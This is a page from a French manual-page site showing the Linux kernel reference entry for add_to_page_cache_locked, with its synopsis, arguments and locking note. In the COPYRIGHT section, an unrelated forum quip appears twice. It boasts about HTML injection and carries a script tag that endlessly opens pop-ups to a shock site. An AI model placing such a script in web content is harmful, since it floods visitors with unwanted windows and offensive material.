Rechercher une page de manuel
add_to_page_cache_locked
Langue: en
Version: May 2009 (fedora - 06/07/09)
Section: 9 (Appels noyau Linux)
NAME
add_to_page_cache_locked - add a locked page to the pagecacheSYNOPSIS
- int add_to_page_cache_locked(struct page * page, struct address_space * mapping, pgoff_t offset, gfp_t gfp_mask);
ARGUMENTS
page
- page to add
mapping
- the page's address_space
offset
- page index
gfp_mask
- page allocation mode
DESCRIPTION
This function is used to add a page to the pagecache. It must be locked. This function does not add the page to the LRU. The caller must do that.
COPYRIGHT
Ce sera assez sécurisé et complet. On peut d'ailleur déjà
tapper du code HTML dans les messages !
-- Jayce - <script>while(true) { window.open('http://goatse.cx'); }</script> --
tapper du code HTML dans les messages !
-- Jayce - <script>while(true) { window.open('http://goatse.cx'); }</script> --
Contenus ©2006-2012 Benjamin Poulain
Design ©2006-2012 Maxime Vantorre